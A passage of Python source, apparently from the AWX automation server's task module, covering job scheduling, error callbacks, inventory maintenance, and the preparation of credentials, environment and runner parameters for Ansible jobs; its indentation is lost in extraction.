pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
except Exception:
logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
if acquired is False:
logger.debug("Not running periodic scheduler, another task holds lock")
return
logger.debug("Starting periodic scheduler")
run_now = now()
state = TowerScheduleState.get_solo()
last_run = state.schedule_last_run
logger.debug("Last scheduler run was: %s", last_run)
state.schedule_last_run = run_now
state.save()
old_schedules = Schedule.objects.enabled().before(last_run)
for schedule in old_schedules:
schedule.update_computed_fields()
schedules = Schedule.objects.enabled().between(last_run, run_now)
invalid_license = False
try:
access_registry[Job](None).check_license(quiet=True)
except PermissionDenied as e:
invalid_license = e
for schedule in schedules:
template = schedule.unified_job_template
schedule.update_computed_fields() # To update next_run timestamp.
if template.cache_timeout_blocked:
logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
continue
try:
job_kwargs = schedule.get_job_kwargs()
new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))
if invalid_license:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = str(invalid_license)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
raise invalid_license
can_start = new_unified_job.signal_start()
except Exception:
logger.exception('Error spawning scheduled job.')
continue
if not can_start:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = gettext_noop(
"Scheduled job could not start because it \
was not in the right state or required manual credentials"
)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
try:
instance = UnifiedJob.get_instance_by_type(task_actual['type'], task_actual['id'])
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in success callback.'.format(task_actual['type'], task_actual['id']))
return
if not instance:
return
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
subtasks = kwargs.get('subtasks', None)
logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
first_instance = None
first_instance_type = ''
if subtasks is not None:
for each_task in subtasks:
try:
instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
if not instance:
# Unknown task type
logger.warn("Unknown task type: {}".format(each_task['type']))
continue
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
continue
if first_instance is None:
first_instance = instance
first_instance_type = each_task['type']
if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
instance.status = 'failed'
instance.failed = True
if not instance.job_explanation:
instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
first_instance_type,
first_instance.name,
first_instance.id,
)
instance.save()
instance.websocket_emit_status("failed")
# We only send 1 job complete message since all the job completion message
# handling does is trigger the scheduler. If we extend the functionality of
# what the job complete message handler does then we may want to send a
# completion event for each job here.
if first_instance:
schedule_task_manager()
pass
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
uj = UnifiedJob.objects.get(pk=job_id)
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
return
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_id)
logger.warn(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
"""
Signal handler and wrapper around inventory.update_computed_fields to
prevent unnecessary recursive calls.
"""
i = Inventory.objects.filter(id=inventory_id)
if not i.exists():
logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
return
i = i[0]
try:
i.update_computed_fields()
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Exiting duplicate update_inventory_computed_fields task.')
return
raise
def update_smart_memberships_for_inventory(smart_inventory):
current = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
new = set(smart_inventory.hosts.values_list('id', flat=True))
additions = new - current
removals = current - new
if additions or removals:
with transaction.atomic():
if removals:
SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=removals).delete()
if additions:
add_for_inventory = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in additions]
SmartInventoryMembership.objects.bulk_create(add_for_inventory, ignore_conflicts=True)
logger.debug(
'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
smart_inventory.pk, len(additions), len(removals), len(new)
)
)
return True # changed
return False
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
smart_inventories = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
changed_inventories = set([])
for smart_inventory in smart_inventories:
try:
changed = update_smart_memberships_for_inventory(smart_inventory)
if changed:
changed_inventories.add(smart_inventory)
except IntegrityError:
logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
# Update computed fields for changed inventories outside atomic action
for smart_inventory in changed_inventories:
smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
# Delete inventory as user
if user_id is None:
user = None
else:
try:
user = User.objects.get(id=user_id)
except Exception:
user = None
with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
try:
i = Inventory.objects.get(id=inventory_id)
for host in i.hosts.iterator():
host.job_events_as_primary_host.update(host=None)
i.delete()
emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
except Inventory.DoesNotExist:
logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
return
except DatabaseError:
logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
if retries > 0:
time.sleep(10)
delete_inventory(inventory_id, user_id, retries=retries - 1)
def with_path_cleanup(f):
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
class BaseTask(object):
model = None
event_model = None
abstract = True
def __init__(self):
self.cleanup_paths = []
self.parent_workflow_job_id = None
self.host_map = {}
self.guid = GuidMiddleware.get_guid()
self.job_created = None
self.recent_event_timings = deque(maxlen=settings.MAX_WEBSOCKET_EVENT_RATE)
def update_model(self, pk, _attempt=0, **updates):
"""Reload the model instance from the database and update the
given fields.
"""
try:
with transaction.atomic():
# Retrieve the model instance.
instance = self.model.objects.get(pk=pk)
# Update the appropriate fields and save the model
# instance, then return the new instance.
if updates:
update_fields = ['modified']
for field, value in updates.items():
setattr(instance, field, value)
update_fields.append(field)
if field == 'status':
update_fields.append('failed')
instance.save(update_fields=update_fields)
return instance
except DatabaseError as e:
# Log out the error to the debug logger.
logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)
# Attempt to retry the update, assuming we haven't already
# tried too many times.
if _attempt < 5:
time.sleep(5)
return self.update_model(pk, _attempt=_attempt + 1, **updates)
else:
logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"container_options": ['--user=root'],
}
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if cred.has_inputs(field_names=('host', 'username', 'password')):
path = os.path.split(private_data_dir)[0]
with open(path + '/auth.json', 'w') as authfile:
os.chmod(authfile.name, stat.S_IRUSR | stat.S_IWUSR)
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
token = "{}:{}".format(username, password)
auth_data = {'auths': {host: {'auth': b64encode(token.encode('UTF-8')).decode('UTF-8')}}}
authfile.write(json.dumps(auth_data, indent=4))
params["container_options"].append(f'--authfile={authfile.name}')
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
# Using z allows the dir to mounted by multiple containers
# Uppercase Z restricts access (in weird ways) to 1 container at a time
params['container_volume_mounts'].append(f'{this_path}:{this_path}:z')
return params
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
Return structure is a dict of the form:
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
pdd_wrapper_path = tempfile.mkdtemp(prefix=f'pdd_wrapper_{instance.pk}_', dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(pdd_wrapper_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(pdd_wrapper_path)
path = tempfile.mkdtemp(prefix='awx_%s_' % instance.pk, dir=pdd_wrapper_path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
# Ansible runner requires that project exists,
# and we will write files in the other folders without pre-creating the folder
for subfolder in ('project', 'inventory', 'env'):
runner_subfolder = os.path.join(path, subfolder)
if not os.path.exists(runner_subfolder):
os.mkdir(runner_subfolder)
return path
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
try:
os.mkdir(os.path.join(private_data_dir, 'env'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(private_data_dir, 'env', 'ssh_key')
ansible_runner.utils.open_fifo_write(path, data.encode())
private_data_files['credentials']['ssh'] = path
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
handle, path = tempfile.mkstemp(dir=os.path.join(private_data_dir, 'env'))
f = os.fdopen(handle, 'w')
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
private_data_files['credentials'][credential] = path
for credential, data in private_data.get('certificates', {}).items():
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir, mode=0o700)
path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
with open(path, 'w') as f:
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
return private_data_files
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via -e@file.yml
"""
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'extravars')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
f.write(yaml.safe_dump(vars))
else:
f.write(safe_dump(vars, safe_dict))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def add_awx_venv(self, env):
env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
if 'PATH' in env:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin") + ":" + env['PATH']
else:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin")
def build_env(self, instance, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
if self.instance.execution_environment is None:
raise RuntimeError('The project could not sync because there is no Execution Environment.')
ee_cred = self.instance.execution_environment.credential
if ee_cred:
verify_ssl = ee_cred.get_input('verify_ssl')
if not verify_ssl:
pdd_wrapper_path = os.path.split(private_data_dir)[0]
registries_conf_path = os.path.join(pdd_wrapper_path, 'registries.conf')
host = ee_cred.get_input('host')
with open(registries_conf_path, 'w') as registries_conf:
os.chmod(registries_conf.name, stat.S_IRUSR | stat.S_IWUSR)
lines = [
'[[registry]]',
'location = "{}"'.format(host),
'insecure = true',
]
registries_conf.write('\n'.join(lines))
# Podman >= 3.1.0
env['CONTAINERS_REGISTRIES_CONF'] = registries_conf_path
# Podman < 3.1.0
env['REGISTRIES_CONFIG_PATH'] = registries_conf_path
return env
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
script_data = instance.inventory.get_script_data(**script_params)
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
json_data = json.dumps(script_data)
path = os.path.join(private_data_dir, 'inventory')
fn = os.path.join(path, 'hosts')
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
return fn
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'cmdline')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(ansible_runner.utils.args2cmdline(*args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
awx_profiling_dir = '/var/log/tower/playbook_profiling/'
collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
if not os.path.exists(awx_profiling_dir):
os.mkdir(awx_profiling_dir)
if os.path.isdir(job_profiling_dir):
shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def event_handler(self, event_data):
#
# ⚠️ D-D-D-DANGER ZONE ⚠️
# This method is called once for *every event* emitted by Ansible
# Runner as a playbook runs. That means that changes to the code in
# this method are _very_ likely to introduce performance regressions.
#
# Even if this function is made on average .05s slower, it can have
# devastating performance implications for playbooks that emit
# tens or hundreds of thousands of events.
#
# Proceed with caution!
#
"""
Ansible runner puts a parent_uuid on each event, no matter what the type.
AWX only saves the parent_uuid if the event is for a Job.
"""
# cache end_line locally for RunInventoryUpdate tasks
# which generate job events from two 'streams':
# ansible-inventory and the awx.main.commands.inventory_import
# logger
if isinstance(self, RunInventoryUpdate):
self.end_line = event_data['end_line']
if event_data.get(self.event_data_key, None):
if self.event_data_key != 'job_id':
event_data.pop('parent_uuid', None)
if self.parent_workflow_job_id:
event_data['workflow_job_id'] = self.parent_workflow_job_id
event_data['job_created'] = self.job_created
if self.host_map:
host = event_data.get('event_data', {}).get('host', '').strip()
if host:
event_data['host_name'] = host
if host in self.host_map:
event_data['host_id'] = self.host_map[host]
else:
event_data['host_name'] = ''
event_data['host_id'] = ''
if event_data.get('event') == 'playbook_on_stats':
event_data['host_map'] = self.host_map
if isinstance(self, RunProjectUpdate):
# it's common for Ansible's SCM modules to print
# error messages on failure that contain the plaintext
# basic auth credentials (username + password)
# it's also common for the nested event data itself (['res']['...'])
# to contain unredacted text on failure
# this is a _little_ expensive to filter
# with regex, but project updates don't have many events,
# so it *should* have a negligible performance impact
task = event_data.get('event_data', {}).get('task_action')
try:
if task in ('git', 'svn'):
event_data_json = json.dumps(event_data)
event_data_json = UriCleaner.remove_sensitive(event_data_json)
event_data = json.loads(event_data_json)
except json.JSONDecodeError:
pass
if 'event_data' in event_data:
event_data['event_data']['guid'] = self.guid
# To prevent overwhelming the broadcast queue, skip some websocket messages
if self.recent_event_timings:
cpu_time = time.time()
first_window_time = self.recent_event_timings[0]
last_window_time = self.recent_event_timings[-1]
if event_data.get('event') in MINIMAL_EVENTS:
should_emit = True # always send some types like playbook_on_stats
elif event_data.get('stdout') == '' and event_data['start_line'] == event_data['end_line']:
should_emit = False # exclude events with no output
else:
should_emit = any(
[
# if 30the most recent websocket message was sent over 1 second ago
cpu_time - first_window_time > 1.0,
# if the very last websocket message came in over 1/30 seconds ago
self.recent_event_timings.maxlen * (cpu_time - last_window_time) > 1.0,
# if the queue is not yet full
len(self.recent_event_timings) != self.recent_event_timings.maxlen,
]
)
if should_emit:
self.recent_event_timings.append(cpu_time)
else:
event_data.setdefault('event_data', {})
event_data['skip_websocket_message'] = True
elif self.recent_event_timings.maxlen:
self.recent_event_timings.append(time.time())
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
self.event_ct += 1
'''
Handle artifacts
'''
if event_data.get('event_data', {}).get('artifact_data', {}):
self.instance.artifacts = event_data['event_data']['artifact_data']
self.instance.save(update_fields=['artifacts'])
return False
def cancel_callback(self):
"""
Ansible runner callback to tell the job when/if it is canceled
"""
unified_job_id = self.instance.pk
self.instance = self.update_model(unified_job_id)
if not self.instance:
logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
return True
if self.instance.cancel_flag or self.instance.status == 'canceled':
cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
if cancel_wait > 5:
logger.warn('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
return True
return False
def finished_callback(self, runner_obj):
"""
Ansible runner callback triggered on finished run
"""
event_data = {
'event': 'EOF',
'final_counter': self.event_ct,
'guid': self.guid,
}
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
def status_handler(self, status_data, runner_config):
"""
Ansible runner callback triggered on status transition
"""
if status_data['status'] == 'starting':
job_env = dict(runner_config.env)
'''
Take the safe environment variables and overwrite
'''
for k, v in self.safe_env.items():
if k in job_env:
job_env[k] = v
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
elif status_data['status'] == 'error':
result_traceback = status_data.get('result_traceback', None)
if result_traceback:
self.instance = self.update_model(self.instance.pk, result_traceback=result_traceback)
@with_path_cleanup
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
if self.instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
# self.instance because of the update_model pattern and when it's used in callback handlers
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
extra_update_fields = {}
fact_modification_times = {}
self.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_env = {}
self.safe_cred_env = {}
private_data_dir = None
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.parent_workflow_job_id = self.instance.get_workflow_job().id
self.job_created = str(self.instance.created)
try:
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
if self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if getattr(self.instance, 'use_fact_cache', False):
self.instance.start_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
fact_modification_times,
)
# May have to serialize the value
private_data_files = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
self.safe_env = build_safe_env(env)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'envvars': env,
'settings': {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
},
}
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
if getattr(self.instance, 'use_fact_cache', False):
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
self.dispatcher = CallbackQueueDispatcher()
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
res = ansible_runner.interface.run(
project_dir=settings.BASE_DIR,
event_handler=self.event_handler,
finished_callback=self.finished_callback,
status_handler=self.status_handler,
**params,
)
else:
receptor_job = AWXReceptorJob(self, params)
self.unit_id = receptor_job.unit_id
res = receptor_job.run()
if not res:
return
status = res.status
rc = res.rc
if status == 'timeout':
self.instance.job_explanation = "Job terminated due to timeout"
status = 'failed'
extra_update_fields['job_explanation'] = self.instance.job_explanation
# ensure failure notification sends even if playbook_on_stats event is not triggered
handle_success_and_failure_notifications.apply_async([self.instance.job.id])
except InvalidVirtualenvError as e:
extra_update_fields['job_explanation'] = e.message
logger.error('{} {}'.format(self.instance.log_format, e.message))
except Exception:
# this could catch programming or file system errors
extra_update_fields['result_traceback'] = traceback.format_exc()
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
extra_update_fields['job_explanation'] = exc.args[0]
if exc.tb:
extra_update_fields['result_traceback'] = exc.tb
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)
try:
self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
event_data_key = 'job_id'
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
